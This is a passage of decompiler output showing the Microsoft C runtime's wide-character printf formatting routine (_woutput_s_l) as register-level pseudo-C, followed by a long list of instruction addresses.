    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																						__eflags =  *(__ebp - 0x10) & 0x00000020;
    																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__edx = 0;
    																								__eflags = 0;
    																								 *(__ebp - 0x4a0) = __eax;
    																								 *(__ebp - 0x49c) = 0;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								asm("cdq");
    																								 *(__ebp - 0x4a0) = __eax;
    																								 *(__ebp - 0x49c) = __edx;
    																							}
    																						} else {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																								asm("cdq");
    																								 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																								 *(__ebp - 0x49c) = __edx;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__ax = __eax;
    																								asm("cdq");
    																								 *(__ebp - 0x4a0) = __eax;
    																								 *(__ebp - 0x49c) = __edx;
    																							}
    																						}
    																					} else {
    																						__eax = __ebp + 0x14;
    																						 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																						 *(__ebp - 0x49c) = __edx;
    																					}
    																				} else {
    																					__ecx = __ebp + 0x14;
    																					 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x49c) = __edx;
    																				}
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																				__eflags =  *(__ebp - 0x10) & 0x00000040;
    																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																					goto L167;
    																				}
    																				goto L163;
    																			}
    																		case 0xd:
    																			L144:
    																			 *(__ebp - 0x460) = 0x27;
    																			L145:
    																			 *(__ebp - 8) = 0x10;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			__eflags =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				__edx = 0x30;
    																				 *(__ebp - 0x14) = __dx;
    																				 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
    																				__eflags =  *(__ebp - 0x460) + 0x51;
    																				 *(__ebp - 0x12) = __ax;
    																				 *(__ebp - 0x1c) = 2;
    																			}
    																			while(1) {
    																				L150:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																				__eflags =  *(__ebp - 0x10) & 0x00008000;
    																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																					__eflags =  *(__ebp - 0x10) & 0x00001000;
    																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																						__eflags =  *(__ebp - 0x10) & 0x00000020;
    																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__edx = 0;
    																								__eflags = 0;
    																								 *(__ebp - 0x4a0) = __eax;
    																								 *(__ebp - 0x49c) = 0;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								asm("cdq");
    																								 *(__ebp - 0x4a0) = __eax;
    																								 *(__ebp - 0x49c) = __edx;
    																							}
    																						} else {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																								asm("cdq");
    																								 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																								 *(__ebp - 0x49c) = __edx;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__ax = __eax;
    																								asm("cdq");
    																								 *(__ebp - 0x4a0) = __eax;
    																								 *(__ebp - 0x49c) = __edx;
    																							}
    																						}
    																					} else {
    																						__eax = __ebp + 0x14;
    																						 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																						 *(__ebp - 0x49c) = __edx;
    																					}
    																				} else {
    																					__ecx = __ebp + 0x14;
    																					 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x49c) = __edx;
    																				}
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																				__eflags =  *(__ebp - 0x10) & 0x00000040;
    																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																					goto L167;
    																				}
    																				goto L163;
    																			}
    																		case 0xe:
    																			while(1) {
    																				L187:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L212;
    																				}
    																				goto L188;
    																			}
    																	}
    																case 8:
    																	L24:
    																	__ecx =  *(__ebp - 0x10);
    																	__ecx =  *(__ebp - 0x10) | 0x00000002;
    																	 *(__ebp - 0x10) = __ecx;
    																	goto L27;
    																case 9:
    																	L25:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																	goto L27;
    																case 0xa:
    																	L23:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																	goto L27;
    																case 0xb:
    																	L22:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																	goto L27;
    																case 0xc:
    																	L26:
    																	__eax =  *(__ebp - 0x10);
    																	__eax =  *(__ebp - 0x10) | 0x00000008;
    																	__eflags = __eax;
    																	 *(__ebp - 0x10) = __eax;
    																	goto L27;
    																case 0xd:
    																	L27:
    																	goto L214;
    															}
    														} else {
    															_t517 = 0;
    															if(0 == 0) {
    																 *(_t525 - 0x4dc) = 0;
    															} else {
    																 *(_t525 - 0x4dc) = 1;
    															}
    															 *(_t525 - 0x46c) =  *(_t525 - 0x4dc);
    															if( *(_t525 - 0x46c) == 0) {
    																_push( &M00B77C38);
    																_push(0);
    																_push(0x460);
    																_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																_push(2);
    																_t498 = L00B7D760();
    																_t527 = _t527 + 0x14;
    																if(_t498 == 1) {
    																	asm("int3");
    																}
    															}
    															L14:
    															if( *(_t525 - 0x46c) != 0) {
    																goto L16;
    															} else {
    																 *((intOrPtr*)(L00B80C60(_t510))) = 0x16;
    																E00B809F0(_t501, _t510, _t523, _t524,  &M00B77C38, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    																 *(_t525 - 0x4c8) = 0xffffffff;
    																E00B7C650(_t525 - 0x40);
    																_t483 =  *(_t525 - 0x4c8);
    																L225:
    																return E00B805D0(_t483, _t501,  *(_t525 - 0x48) ^ _t525, _t517, _t523, _t524);
    															}
    														}
    													}
    													L215:
    													__eflags =  *(_t525 - 0x45c);
    													if( *(_t525 - 0x45c) == 0) {
    														L218:
    														 *(_t525 - 0x4f8) = 1;
    														L219:
    														_t517 =  *(_t525 - 0x4f8);
    														 *(_t525 - 0x4bc) =  *(_t525 - 0x4f8);
    														__eflags =  *(_t525 - 0x4bc);
    														if( *(_t525 - 0x4bc) == 0) {
    															_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    															_push(0);
    															_push(0x8f5);
    															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    															_push(2);
    															_t488 = L00B7D760();
    															_t527 = _t527 + 0x14;
    															__eflags = _t488 - 1;
    															if(_t488 == 1) {
    																asm("int3");
    															}
    														}
    														__eflags =  *(_t525 - 0x4bc);
    														if( *(_t525 - 0x4bc) != 0) {
    															 *(_t525 - 0x4d4) =  *(_t525 - 0x44c);
    															E00B7C650(_t525 - 0x40);
    															_t483 =  *(_t525 - 0x4d4);
    														} else {
    															 *((intOrPtr*)(L00B80C60(_t502))) = 0x16;
    															E00B809F0(_t501, _t502, _t523, _t524, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    															 *(_t525 - 0x4d0) = 0xffffffff;
    															E00B7C650(_t525 - 0x40);
    															_t483 =  *(_t525 - 0x4d0);
    														}
    														goto L225;
    													}
    													L216:
    													__eflags =  *(_t525 - 0x45c) - 7;
    													if( *(_t525 - 0x45c) == 7) {
    														goto L218;
    													}
    													L217:
    													 *(_t525 - 0x4f8) = 0;
    													goto L219;
    												}
    											}
    											L184:
    											__eflags =  *(__ebp - 0x24);
    											if( *(__ebp - 0x24) == 0) {
    												L186:
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												__eax =  *(__ebp - 4);
    												 *( *(__ebp - 4)) = 0x30;
    												__ecx =  *(__ebp - 0x24);
    												__ecx =  *(__ebp - 0x24) + 1;
    												__eflags = __ecx;
    												 *(__ebp - 0x24) = __ecx;
    												goto L187;
    											}
    											L185:
    											__eax =  *(__ebp - 4);
    											__ecx =  *( *(__ebp - 4));
    											__eflags = __ecx - 0x30;
    											if(__ecx == 0x30) {
    												goto L187;
    											}
    											goto L186;
    										}
    										L180:
    										__eax =  *(__ebp - 8);
    										asm("cdq");
    										__ecx =  *(__ebp - 0x4a4);
    										__edx =  *(__ebp - 0x4a8);
    										__eax = E00B855B0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
    										 *(__ebp - 0x494) = __eax;
    										__eax =  *(__ebp - 8);
    										asm("cdq");
    										__eax =  *(__ebp - 0x4a4);
    										__ecx =  *(__ebp - 0x4a8);
    										 *(__ebp - 0x4a8) = E00B85630( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
    										 *(__ebp - 0x4a4) = __edx;
    										__eflags =  *(__ebp - 0x494) - 0x39;
    										if( *(__ebp - 0x494) > 0x39) {
    											__edx =  *(__ebp - 0x494);
    											__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
    											__eflags = __edx;
    											 *(__ebp - 0x494) = __edx;
    										}
    										__eax =  *(__ebp - 4);
    										 *( *(__ebp - 4)) =  *(__ebp - 0x494);
    										 *(__ebp - 4) =  *(__ebp - 4) - 1;
    										 *(__ebp - 4) =  *(__ebp - 4) - 1;
    										L178:
    										__ecx =  *(__ebp - 0x30);
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										__eflags =  *(__ebp - 0x30);
    										if( *(__ebp - 0x30) > 0) {
    											goto L180;
    										}
    										goto L179;
    									}
    								}
    								L165:
    								__eflags =  *(__ebp - 0x4a0);
    								if( *(__ebp - 0x4a0) >= 0) {
    									goto L167;
    								}
    								goto L166;
    								L167:
    								__ecx =  *(__ebp - 0x4a0);
    								 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
    								__edx =  *(__ebp - 0x49c);
    								 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
    								goto L168;
    							}
    						}
    					}
    				}
    			}













    0x00b96a76
    0x00b96a76
    0x00b96a76
    0x00b96a76
    0x00b96a7d
    0x00b96a7d
    0x00b96a7d
    0x00b96a93
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00b96ae2
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00000000
    0x00000000
    0x00b96bc0
    0x00b96bc0
    0x00b96bc7
    0x00000000
    0x00000000
    0x00b96bc9
    0x00b96bc9
    0x00b96bd4
    0x00b96bda
    0x00b96bdc
    0x00b96be2
    0x00b96be5
    0x00b96be7
    0x00b96bed
    0x00b96bf6
    0x00b96bfb
    0x00b96c18
    0x00b96c1b
    0x00b96c1b
    0x00b96c20
    0x00b96c25
    0x00b96c25
    0x00b96c2b
    0x00b96c2d
    0x00b96c33
    0x00b96c39
    0x00b96c39
    0x00b96c42
    0x00b96c42
    0x00b96c2b
    0x00b96c48
    0x00b96c4c
    0x00b96c5a
    0x00b96c5d
    0x00b96c60
    0x00b96c67
    0x00b96c69
    0x00b96c69
    0x00b96c4e
    0x00b96c4e
    0x00b96c4e
    0x00b96c76
    0x00b96c76
    0x00b96c7c
    0x00b96c7e
    0x00b96c7e
    0x00b96c85
    0x00b96c8b
    0x00b96c8e
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00b96c9e
    0x00b96ca4
    0x00b96ca4
    0x00b96caa
    0x00b96d27
    0x00b96d2d
    0x00b96d30
    0x00b96d33
    0x00b96d36
    0x00b96d39
    0x00b96d3f
    0x00b96d3f
    0x00b96d45
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00b96d7a
    0x00b96d7d
    0x00b96d7d
    0x00b96d80
    0x00b96d85
    0x00b96d85
    0x00b96d8a
    0x00b96da1
    0x00b96da1
    0x00b96da4
    0x00b96dbb
    0x00b96dbb
    0x00b96dbe
    0x00b96dc0
    0x00b96dc5
    0x00b96dc9
    0x00b96dc9
    0x00b96da6
    0x00b96da6
    0x00b96dab
    0x00b96daf
    0x00b96daf
    0x00b96d8c
    0x00b96d8c
    0x00b96d91
    0x00b96d95
    0x00b96d95
    0x00b96d8a
    0x00b96dd3
    0x00b96dd6
    0x00b96dd9
    0x00b96de2
    0x00b96de2
    0x00b96de5
    0x00b96de7
    0x00b96dee
    0x00b96df2
    0x00b96dfb
    0x00b96e00
    0x00b96e03
    0x00b96e0a
    0x00b96e0e
    0x00b96e12
    0x00b96e1e
    0x00b96e21
    0x00b96e21
    0x00b96e24
    0x00b96e29
    0x00b96e29
    0x00b96e2c
    0x00b96e2e
    0x00b96e35
    0x00b96e39
    0x00b96e42
    0x00b96e47
    0x00b96e2c
    0x00b96e4a
    0x00b96e4e
    0x00b96f08
    0x00b96f08
    0x00b96f0f
    0x00b96f13
    0x00b96f17
    0x00b96f1b
    0x00000000
    0x00b96e54
    0x00b96e54
    0x00b96e54
    0x00b96e58
    0x00000000
    0x00000000
    0x00b96e5e
    0x00b96e5e
    0x00b96e61
    0x00b96e67
    0x00b96e6a
    0x00b96e70
    0x00b96e70
    0x00b96e70
    0x00b96e7c
    0x00b96e7f
    0x00b96e85
    0x00b96e87
    0x00000000
    0x00000000
    0x00b96e89
    0x00b96e89
    0x00b96e8c
    0x00b96e92
    0x00b96e9a
    0x00b96e9c
    0x00b96ea3
    0x00b96eaa
    0x00b96eb9
    0x00b96ebf
    0x00b96ec6
    0x00b96ed4
    0x00b96ed4
    0x00b96edb
    0x00b96ee7
    0x00b96ef5
    0x00b96efb
    0x00000000
    0x00b96efb
    0x00b96ec8
    0x00b96ec8
    0x00000000
    0x00b96ec8
    0x00b96f06
    0x00b96f23
    0x00b96f23
    0x00b96f2a
    0x00b96f2f
    0x00b96f2f
    0x00b96f32
    0x00b96f34
    0x00b96f3b
    0x00b96f48
    0x00b96f4d
    0x00b96f32
    0x00b96f2a
    0x00b96f50
    0x00b96f50
    0x00b96f54
    0x00b96f58
    0x00b96f5c
    0x00b96f64
    0x00b96f64
    0x00b96f6b
    0x00b96f6b
    0x00b960eb
    0x00b960f2
    0x00b960ff
    0x00b96104
    0x00000000
    0x00b96117
    0x00b96121
    0x00b96148
    0x00b9612f
    0x00b96140
    0x00b96140
    0x00b96121
    0x00b96152
    0x00b96158
    0x00b96164
    0x00b96167
    0x00b96175
    0x00b96178
    0x00b96185
    0x00b9622a
    0x00b96230
    0x00b96236
    0x00b9623d
    0x00000000
    0x00000000
    0x00b96243
    0x00b96249
    0x00000000
    0x00b96250
    0x00b96250
    0x00b9626a
    0x00b9626f
    0x00000000
    0x00000000
    0x00b96277
    0x00b96277
    0x00b9627e
    0x00b96281
    0x00b96284
    0x00b96287
    0x00b9628a
    0x00b9628d
    0x00b96290
    0x00b96297
    0x00b9629e
    0x00000000
    0x00000000
    0x00b962aa
    0x00b962aa
    0x00b962b1
    0x00b962bd
    0x00b962c0
    0x00b962c6
    0x00b962cd
    0x00000000
    0x00000000
    0x00b962cf
    0x00b962d5
    0x00b962d5
    0x00b962dc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b96320
    0x00b96320
    0x00b96327
    0x00b9632a
    0x00b96354
    0x00b96357
    0x00b96357
    0x00b96361
    0x00b96361
    0x00b96365
    0x00b9632c
    0x00b9632c
    0x00b96338
    0x00b9633b
    0x00b9633f
    0x00b96341
    0x00b96344
    0x00b96344
    0x00b96347
    0x00b9634a
    0x00b9634d
    0x00b9634f
    0x00b9634f
    0x00b96352
    0x00b96368
    0x00000000
    0x00000000
    0x00b9636d
    0x00b9636d
    0x00000000
    0x00000000
    0x00b96379
    0x00b96379
    0x00b96380
    0x00b96383
    0x00b963a3
    0x00b963a6
    0x00b963a6
    0x00b963b0
    0x00b963b0
    0x00b963b4
    0x00b96385
    0x00b96385
    0x00b96391
    0x00b96394
    0x00b96398
    0x00b9639a
    0x00b9639a
    0x00b963a1
    0x00000000
    0x00000000
    0x00b963bc
    0x00b963bc
    0x00b963c3
    0x00b963cf
    0x00b963d2
    0x00b963d8
    0x00b963df
    0x00b964f2
    0x00000000
    0x00b964f2
    0x00b963e5
    0x00b963eb
    0x00b963eb
    0x00b963f2
    0x00000000
    0x00b96429
    0x00b96429
    0x00b9642c
    0x00b9642f
    0x00b96432
    0x00b96459
    0x00b96459
    0x00b9645c
    0x00b9645f
    0x00b96462
    0x00b96486
    0x00b96486
    0x00b96489
    0x00b9648c
    0x00b9648f
    0x00b964c8
    0x00b964d9
    0x00000000
    0x00b964d9
    0x00b96491
    0x00b96491
    0x00b96494
    0x00b96497
    0x00b9649a
    0x00000000
    0x00000000
    0x00b9649c
    0x00b9649c
    0x00b9649f
    0x00b964a2
    0x00b964a5
    0x00000000
    0x00000000
    0x00b964a7
    0x00b964a7
    0x00b964aa
    0x00b964ad
    0x00b964b0
    0x00000000
    0x00000000
    0x00b964b2
    0x00b964b2
    0x00b964b5
    0x00b964b8
    0x00b964bb
    0x00000000
    0x00000000
    0x00b964bd
    0x00b964bd
    0x00b964c0
    0x00b964c3
    0x00b964c6
    0x00b964ca
    0x00000000
    0x00b964ca
    0x00000000
    0x00b964c6
    0x00b96464
    0x00b96464
    0x00b96467
    0x00b9646b
    0x00b9646e
    0x00000000
    0x00b96470
    0x00b96473
    0x00b96476
    0x00b9647c
    0x00b96481
    0x00000000
    0x00b96481
    0x00b9646e
    0x00b96434
    0x00b96434
    0x00b96437
    0x00b9643b
    0x00b9643e
    0x00000000
    0x00b96440
    0x00b96443
    0x00b96446
    0x00b9644c
    0x00b96451
    0x00000000
    0x00b96451
    0x00000000
    0x00b964db
    0x00b964db
    0x00b964de
    0x00b964e1
    0x00000000
    0x00000000
    0x00b963f9
    0x00b963f9
    0x00b963fc
    0x00b963ff
    0x00b96402
    0x00b9641b
    0x00b9641e
    0x00b9641e
    0x00b96421
    0x00b96404
    0x00b96404
    0x00b96407
    0x00b9640a
    0x00b96410
    0x00b96416
    0x00b96416
    0x00000000
    0x00000000
    0x00b964e6
    0x00b964e6
    0x00b964e9
    0x00b964e9
    0x00b964ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b964f7
    0x00b964f7
    0x00b964fe
    0x00b96504
    0x00b9650a
    0x00b9650d
    0x00b96513
    0x00b9651a
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00b96520
    0x00b96526
    0x00b96526
    0x00b9652d
    0x00000000
    0x00b968b1
    0x00b968b1
    0x00b968bf
    0x00b968bf
    0x00b968c2
    0x00000000
    0x00000000
    0x00b96534
    0x00b96537
    0x00b96537
    0x00b9653d
    0x00b9653f
    0x00b96542
    0x00b96542
    0x00b96545
    0x00b96545
    0x00000000
    0x00000000
    0x00b9667a
    0x00b9667d
    0x00b9667d
    0x00b96682
    0x00b96684
    0x00b96687
    0x00b96687
    0x00b9668a
    0x00b9668a
    0x00000000
    0x00000000
    0x00b96a7d
    0x00b96a7d
    0x00000000
    0x00000000
    0x00b965e4
    0x00b965e4
    0x00b965f0
    0x00b965f6
    0x00b965fd
    0x00b9660b
    0x00b9660b
    0x00b96611
    0x00b96614
    0x00b96620
    0x00b96675
    0x00000000
    0x00b96675
    0x00b965ff
    0x00b965ff
    0x00b96605
    0x00b96609
    0x00b96628
    0x00b96628
    0x00b9662e
    0x00b96656
    0x00b9665d
    0x00b96663
    0x00b96666
    0x00b96669
    0x00b9666f
    0x00b96672
    0x00b96630
    0x00b96630
    0x00b96636
    0x00b96639
    0x00b9663c
    0x00b96642
    0x00b96645
    0x00b96648
    0x00b9664a
    0x00b9664d
    0x00b9664d
    0x00000000
    0x00b9662e
    0x00000000
    0x00000000
    0x00b968c9
    0x00b968cc
    0x00b968cf
    0x00b968d2
    0x00b968d8
    0x00b968db
    0x00b968e2
    0x00b968e6
    0x00b968f1
    0x00b968f1
    0x00b968f5
    0x00b9690c
    0x00b9690c
    0x00b96913
    0x00b96915
    0x00b96915
    0x00b9691c
    0x00b9691c
    0x00b96923
    0x00b96931
    0x00b96934
    0x00b96943
    0x00b96946
    0x00b9694a
    0x00b9695f
    0x00b9694c
    0x00b9694c
    0x00b9694f
    0x00b96955
    0x00b9695a
    0x00b9695a
    0x00b9694a
    0x00b96969
    0x00b9696c
    0x00b9696f
    0x00b96972
    0x00b96975
    0x00b96978
    0x00b9697e
    0x00b96984
    0x00b9698c
    0x00b9698d
    0x00b96990
    0x00b96991
    0x00b96994
    0x00b96995
    0x00b9699c
    0x00b9699d
    0x00b969a0
    0x00b969a1
    0x00b969a4
    0x00b969a5
    0x00b969ab
    0x00b969ac
    0x00b969bb
    0x00b969bd
    0x00b969c3
    0x00b969c3
    0x00b969c8
    0x00b969ca
    0x00b969ce
    0x00b969d0
    0x00b969d8
    0x00b969d9
    0x00b969dc
    0x00b969dd
    0x00b969ec
    0x00b969ee
    0x00b969ee
    0x00b969ce
    0x00b969f1
    0x00b969f8
    0x00b969fb
    0x00b96a00
    0x00b96a00
    0x00b96a06
    0x00b96a08
    0x00b96a10
    0x00b96a11
    0x00b96a14
    0x00b96a15
    0x00b96a23
    0x00b96a25
    0x00b96a25
    0x00b96a06
    0x00b96a28
    0x00b96a2b
    0x00b96a2e
    0x00b96a31
    0x00b96a36
    0x00b96a3b
    0x00b96a3e
    0x00b96a41
    0x00b96a41
    0x00b96a44
    0x00b96a44
    0x00b96a47
    0x00b96a53
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00b96d70
    0x00b968f7
    0x00b968f7
    0x00b968fe
    0x00b96901
    0x00000000
    0x00000000
    0x00b96903
    0x00b96903
    0x00000000
    0x00b96903
    0x00b968e8
    0x00b968e8
    0x00000000
    0x00000000
    0x00b96548
    0x00b96548
    0x00b96553
    0x00b9655b
    0x00b96562
    0x00b96565
    0x00b96565
    0x00b96568
    0x00b965c1
    0x00b965c8
    0x00b9656a
    0x00b96571
    0x00b96577
    0x00b9657d
    0x00b96584
    0x00b96587
    0x00b9658d
    0x00b96595
    0x00b96597
    0x00b9659e
    0x00b965a5
    0x00b965ac
    0x00b965b4
    0x00b965b6
    0x00b965b8
    0x00b965b8
    0x00b965bf
    0x00b965cf
    0x00b965d5
    0x00b965d8
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00b96a5b
    0x00b96a5e
    0x00b96a61
    0x00b96a64
    0x00000000
    0x00000000
    0x00b967ba
    0x00b967ba
    0x00b967c6
    0x00b967cc
    0x00b967d1
    0x00b967d3
    0x00b9687d
    0x00b9687d
    0x00b96880
    0x00b96880
    0x00b96883
    0x00b96897
    0x00b9689d
    0x00b968a3
    0x00b96885
    0x00b96885
    0x00b9688b
    0x00b96892
    0x00b96892
    0x00b968a5
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00b967d9
    0x00b967d9
    0x00b967d9
    0x00b967db
    0x00b967e9
    0x00b967dd
    0x00b967dd
    0x00b967dd
    0x00b967f3
    0x00b967f9
    0x00b967ff
    0x00b96806
    0x00b96808
    0x00b9680d
    0x00b9680f
    0x00b96814
    0x00b96819
    0x00b9681b
    0x00b96820
    0x00b96823
    0x00b96826
    0x00b96828
    0x00b96828
    0x00b96826
    0x00b96829
    0x00b96830
    0x00b96878
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96832
    0x00b96832
    0x00b96837
    0x00b96853
    0x00b9685b
    0x00b96865
    0x00b96868
    0x00b9686d
    0x00000000
    0x00b9686d
    0x00000000
    0x00b96ac4
    0x00b96ac4
    0x00b96ace
    0x00b96ace
    0x00b96ad4
    0x00b96ad6
    0x00b96ad9
    0x00b96ad9
    0x00b96adf
    0x00b96adf
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b9668d
    0x00b9668d
    0x00b96691
    0x00b9669f
    0x00b966a2
    0x00b96693
    0x00b96693
    0x00b96693
    0x00b966a8
    0x00b966ae
    0x00b966b4
    0x00b966c0
    0x00b966c6
    0x00b966c6
    0x00b966c9
    0x00b96751
    0x00b96751
    0x00b96755
    0x00b96757
    0x00b9675d
    0x00b9675d
    0x00b96760
    0x00b96767
    0x00b9676a
    0x00b96770
    0x00b96770
    0x00b96770
    0x00b96776
    0x00b9677c
    0x00b9677f
    0x00b96785
    0x00b96787
    0x00000000
    0x00000000
    0x00b96789
    0x00b96789
    0x00b9678f
    0x00b96792
    0x00b96794
    0x00000000
    0x00000000
    0x00b96796
    0x00b9679c
    0x00b9679f
    0x00b9679f
    0x00b967a7
    0x00b967a7
    0x00b967ad
    0x00b967ad
    0x00b967b2
    0x00000000
    0x00b966cf
    0x00b966cf
    0x00b966cf
    0x00b966d3
    0x00b966d5
    0x00b966da
    0x00b966da
    0x00b966dd
    0x00b966e0
